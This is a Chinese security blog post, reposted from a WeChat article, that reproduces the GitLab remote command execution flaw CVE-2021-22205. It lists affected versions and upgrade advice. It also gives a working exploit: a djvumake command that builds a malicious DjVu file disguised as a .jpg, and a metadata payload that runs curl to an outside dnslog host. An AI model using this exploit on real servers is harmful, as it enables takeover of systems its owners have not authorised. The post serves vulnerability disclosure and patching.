CVE-2021-22205 Gitlab远程命令执行漏洞复现

admin 2022年6月8日07:01:51评论165 views字数 831阅读2分46秒阅读模式

漏洞背景

GitLab是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。

近日,GitLab发布安全更新公告,修复了GitLab社区版(CE)和企业版(EE)存在一个远程命令执行漏洞,漏洞CVE编号:CVE-2021-22205。攻击者可利用该漏洞在目标服务器上执行任意命令。建议受影响用户将GitLab升级至最新版本进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。

漏洞描述

该漏洞影响从11.9开始的所有版本,由于Gitlab未正确验证传递到文件解析器的图像文件从而导致命令执行。攻击者可构造恶意请求利用该漏洞在目标系统执行任意指令,最终导致Gitlab服务器被控制。

漏洞等级

高危

漏洞范围

Gitlab CE/EE < 13.10.3

Gitlab CE/EE < 13.9.6

Gitlab CE/EE < 13.8.8

漏洞验证

1.      登录后首页,找到New Snippets

CVE-2021-22205 Gitlab远程命令执行漏洞复现

2.      此处需要上传DjVu格式图片(即Exp)

DjVu格式图片制作方式:下载安装DjVuLibre,地址为

http://djvu.sourceforge.net/

CVE-2021-22205 Gitlab远程命令执行漏洞复现

3.      准备好将要压缩图片的文本

CVE-2021-22205 Gitlab远程命令执行漏洞复现

CVE-2021-22205 Gitlab远程命令执行漏洞复现

4.      使用命令生成图片

djvumake rce.djvu INFO=0,0 BGjp=/dev/null ANTa=rce.txt && mv rce.djvu rce.jpg

CVE-2021-22205 Gitlab远程命令执行漏洞复现

5.      上传Exp

CVE-2021-22205 Gitlab远程命令执行漏洞复现

6.     成功执行

CVE-2021-22205 Gitlab远程命令执行漏洞复现

安全建议

建议用户将GitLab社区版(CE)和企业版(EE)版本升级至13.10.3、13.9.6和13.8.8进行防护。

下载地址:https://about.gitlab.com/update


EXP如下:

(metadata (Copyright "" . qx{curl taotao.jqgvqz.dnslog.cn} . " b ") )


原文始发于微信公众号(赛瑞攻防实验室):CVE-2021-22205 Gitlab远程命令执行漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月8日07:01:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-22205 Gitlab远程命令执行漏洞复现https://cn-sec.com/archives/887242.html

发表评论

匿名网友 填写信息